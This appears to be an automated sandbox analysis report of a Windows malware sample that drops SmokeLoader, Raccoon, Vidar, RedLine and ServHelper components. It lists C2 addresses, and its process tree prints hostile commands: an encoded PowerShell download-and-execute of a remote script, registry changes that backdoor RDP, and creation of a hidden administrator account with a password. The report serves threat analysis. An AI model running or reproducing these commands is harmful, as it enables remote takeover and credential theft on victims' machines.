Analysis

  • max time kernel
    151s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    12-10-2021 13:48

General

  • Target

    8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe

  • Size

    175KB

  • MD5

    2e7e57118f032396e69d376486034f2a

  • SHA1

    776f1be291d84052a024ce14883247eda7307f16

  • SHA256

    8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9

  • SHA512

    fc2905c6f2a095b546ec751c47e28db472f38b89c3f62f71bf8c3cebaa77a5aaa9540340837fe690960beda1999b7dc59c8c9cbadfe30937ef26c2c1d7e108ff

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

fbe5e97e7d069407605ee9138022aa82166657e6

Attributes
  • url4cnc

    http://telemirror.top/stevuitreen

    http://tgmirror.top/stevuitreen

    http://telegatt.top/stevuitreen

    http://telegka.top/stevuitreen

    http://telegin.top/stevuitreen

    https://t.me/stevuitreen

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.3

Botnet

1033

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    1033

Extracted

Family

raccoon

Version

1.8.2

Botnet

8d179b9e611eee525425544ee8c6d77360ab7cd9

Attributes
  • url4cnc

    http://teletop.top/agrybirdsgamerept

    http://teleta.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

raccoon

Version

1.8.2

Botnet

27d80aa27e80cd2ef63c638e2752e24242d1b37c

Attributes
  • url4cnc

    http://telemirror.top/ararius809b

    http://tgmirror.top/ararius809b

    http://telegatt.top/ararius809b

    http://telegka.top/ararius809b

    http://telegin.top/ararius809b

    https://t.me/ararius809b

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Extracted

Family

redline

Botnet

MegaProliv

C2

93.115.20.139:28978

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 24 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe
    "C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe
      "C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3440
  • C:\Users\Admin\AppData\Local\Temp\B18.exe
    C:\Users\Admin\AppData\Local\Temp\B18.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Accesses Microsoft Outlook accounts
    • Accesses Microsoft Outlook profiles
    • outlook_office_path
    • outlook_win_path
    PID:2116
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B18.exe"
      2⤵
        PID:600
        • C:\Windows\SysWOW64\timeout.exe
          timeout /T 10 /NOBREAK
          3⤵
          • Delays execution with timeout.exe
          PID:908
    • C:\Users\Admin\AppData\Local\Temp\1097.exe
      C:\Users\Admin\AppData\Local\Temp\1097.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im 1097.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1097.exe" & del C:\ProgramData\*.dll & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1732
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im 1097.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4004
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          3⤵
          • Delays execution with timeout.exe
          PID:2424
    • C:\Users\Admin\AppData\Local\Temp\252A.exe
      C:\Users\Admin\AppData\Local\Temp\252A.exe
      1⤵
      • Executes dropped EXE
      PID:340
    • C:\Users\Admin\AppData\Local\Temp\343E.exe
      C:\Users\Admin\AppData\Local\Temp\343E.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        2⤵
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1768
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2abndmrr\2abndmrr.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2856
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6453.tmp" "c:\Users\Admin\AppData\Local\Temp\2abndmrr\CSCEB26CC7B85464880AE1BD15E51835B71.TMP"
            4⤵
              PID:3796
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2680
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            3⤵
              PID:1204
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
              3⤵
                PID:1420
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                3⤵
                • Modifies registry key
                PID:1680
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                3⤵
                  PID:2476
                • C:\Windows\system32\net.exe
                  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  3⤵
                    PID:1160
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                      4⤵
                        PID:3836
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                      3⤵
                        PID:4036
                        • C:\Windows\system32\cmd.exe
                          cmd /c net start rdpdr
                          4⤵
                            PID:1700
                            • C:\Windows\system32\net.exe
                              net start rdpdr
                              5⤵
                                PID:1240
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 start rdpdr
                                  6⤵
                                    PID:2632
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                              3⤵
                                PID:2492
                                • C:\Windows\system32\cmd.exe
                                  cmd /c net start TermService
                                  4⤵
                                    PID:2680
                                    • C:\Windows\system32\net.exe
                                      net start TermService
                                      5⤵
                                        PID:2256
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 start TermService
                                          6⤵
                                            PID:3784
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                      3⤵
                                        PID:3572
                                      • C:\Windows\system32\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                        3⤵
                                          PID:2544
                                    • C:\Users\Admin\AppData\Local\Temp\398E.exe
                                      C:\Users\Admin\AppData\Local\Temp\398E.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:3600
                                    • C:\Users\Admin\AppData\Local\Temp\4065.exe
                                      C:\Users\Admin\AppData\Local\Temp\4065.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3252
                                    • C:\Users\Admin\AppData\Local\Temp\4B72.exe
                                      C:\Users\Admin\AppData\Local\Temp\4B72.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:2236
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                        2⤵
                                        • Drops file in System32 directory
                                        • Drops file in Windows directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:2208
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zhwhakk\2zhwhakk.cmdline"
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2332
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F4.tmp" "c:\Users\Admin\AppData\Local\Temp\2zhwhakk\CSC290AEA82CDEF41E2AE75F62B4FAF47A1.TMP"
                                            4⤵
                                              PID:3296
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                            3⤵
                                              PID:2284
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                              3⤵
                                                PID:2544
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  4⤵
                                                    PID:1160
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                  3⤵
                                                    PID:3156
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      4⤵
                                                        PID:908
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                      3⤵
                                                        PID:1160
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                        3⤵
                                                        • Modifies registry key
                                                        PID:688
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                        3⤵
                                                          PID:1124
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                          3⤵
                                                            PID:1248
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                              4⤵
                                                                PID:828
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                              3⤵
                                                                PID:2424
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c net start rdpdr
                                                                  4⤵
                                                                    PID:4004
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net start rdpdr
                                                                      5⤵
                                                                        PID:2160
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 start rdpdr
                                                                          6⤵
                                                                            PID:3672
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                      3⤵
                                                                        PID:1856
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c net start TermService
                                                                          4⤵
                                                                            PID:980
                                                                            • C:\Windows\SysWOW64\net.exe
                                                                              net start TermService
                                                                              5⤵
                                                                                PID:1260
                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                  C:\Windows\system32\net1 start TermService
                                                                                  6⤵
                                                                                    PID:1952
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                                              3⤵
                                                                                PID:360
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                                3⤵
                                                                                  PID:4032
                                                                            • C:\Users\Admin\AppData\Local\Temp\519E.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\519E.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1724
                                                                              • C:\Users\Admin\AppData\Local\Temp\519E.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\519E.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1816
                                                                            • C:\Windows\System32\cmd.exe
                                                                              cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                              1⤵
                                                                                PID:2952
                                                                                • C:\Windows\system32\net.exe
                                                                                  net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                                  2⤵
                                                                                    PID:1616
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                                                                                      3⤵
                                                                                        PID:1780
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    cmd /C net.exe user WgaUtilAcc U5jzqueS /add
                                                                                    1⤵
                                                                                      PID:1396
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net.exe user WgaUtilAcc U5jzqueS /add
                                                                                        2⤵
                                                                                          PID:3520
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 user WgaUtilAcc U5jzqueS /add
                                                                                            3⤵
                                                                                              PID:676
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                          1⤵
                                                                                            PID:2252
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                              2⤵
                                                                                                PID:980
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                  3⤵
                                                                                                    PID:3972
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                1⤵
                                                                                                  PID:2132
                                                                                                  • C:\Windows\system32\net.exe
                                                                                                    net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                    2⤵
                                                                                                      PID:1976
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                        3⤵
                                                                                                          PID:2676
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                      1⤵
                                                                                                        PID:1384
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                          2⤵
                                                                                                            PID:1632
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                              3⤵
                                                                                                                PID:600
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            cmd /C net.exe user WgaUtilAcc U5jzqueS
                                                                                                            1⤵
                                                                                                              PID:888
                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                net.exe user WgaUtilAcc U5jzqueS
                                                                                                                2⤵
                                                                                                                  PID:908
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 user WgaUtilAcc U5jzqueS
                                                                                                                    3⤵
                                                                                                                      PID:2856
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  cmd.exe /C wmic path win32_VideoController get name
                                                                                                                  1⤵
                                                                                                                    PID:2304
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      2⤵
                                                                                                                        PID:1780
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic path win32_VideoController get name
                                                                                                                        2⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:880
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      cmd.exe /C wmic CPU get NAME
                                                                                                                      1⤵
                                                                                                                        PID:676
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic CPU get NAME
                                                                                                                          2⤵
                                                                                                                            PID:4032
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                          1⤵
                                                                                                                            PID:1248
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                              2⤵
                                                                                                                                PID:3916
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                  3⤵
                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:2252

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v6

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\ProgramData\freebl3.dll

                                                                                                                              MD5

                                                                                                                              ef2834ac4ee7d6724f255beaf527e635

                                                                                                                              SHA1

                                                                                                                              5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                                                                                                                              SHA256

                                                                                                                              a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                                                                                                                              SHA512

                                                                                                                              c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                                                                                                                            • C:\ProgramData\mozglue.dll

                                                                                                                              MD5

                                                                                                                              8f73c08a9660691143661bf7332c3c27

                                                                                                                              SHA1

                                                                                                                              37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                                                                              SHA256

                                                                                                                              3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                                                                              SHA512

                                                                                                                              0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                                                                            • C:\ProgramData\msvcp140.dll

                                                                                                                              MD5

                                                                                                                              109f0f02fd37c84bfc7508d4227d7ed5

                                                                                                                              SHA1

                                                                                                                              ef7420141bb15ac334d3964082361a460bfdb975

                                                                                                                              SHA256

                                                                                                                              334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                                                              SHA512

                                                                                                                              46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                                                            • C:\ProgramData\nss3.dll

                                                                                                                              MD5

                                                                                                                              bfac4e3c5908856ba17d41edcd455a51

                                                                                                                              SHA1

                                                                                                                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                                                                                                                              SHA256

                                                                                                                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                                                                                                                              SHA512

                                                                                                                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                                                                                                                            • C:\ProgramData\softokn3.dll

                                                                                                                              MD5

                                                                                                                              a2ee53de9167bf0d6c019303b7ca84e5

                                                                                                                              SHA1

                                                                                                                              2a3c737fa1157e8483815e98b666408a18c0db42

                                                                                                                              SHA256

                                                                                                                              43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                                                                                                                              SHA512

                                                                                                                              45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                                                                                                                            • C:\ProgramData\vcruntime140.dll

                                                                                                                              MD5

                                                                                                                              7587bf9cb4147022cd5681b015183046

                                                                                                                              SHA1

                                                                                                                              f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                                                                              SHA256

                                                                                                                              c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                                                                              SHA512

                                                                                                                              0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\519E.exe.log

                                                                                                                              MD5

                                                                                                                              41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                              SHA1

                                                                                                                              5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                              SHA256

                                                                                                                              df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                              SHA512

                                                                                                                              234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                              MD5

                                                                                                                              9d43e21785cc3169068bf06afc6cf381

                                                                                                                              SHA1

                                                                                                                              4fa0be5efd37649253515426920dc13aef285221

                                                                                                                              SHA256

                                                                                                                              0d2978f868b8225004adf71ff7861290926c9d38cd02431f17b21b1e145e38f1

                                                                                                                              SHA512

                                                                                                                              08d056a8e6bb95e21270e9ac42d851124ffa5fbe6b3917558551e7726645bc8ebe288f999df33c4620d11a817e9d96bef597b47d4bee151727b0e308c17cb75b

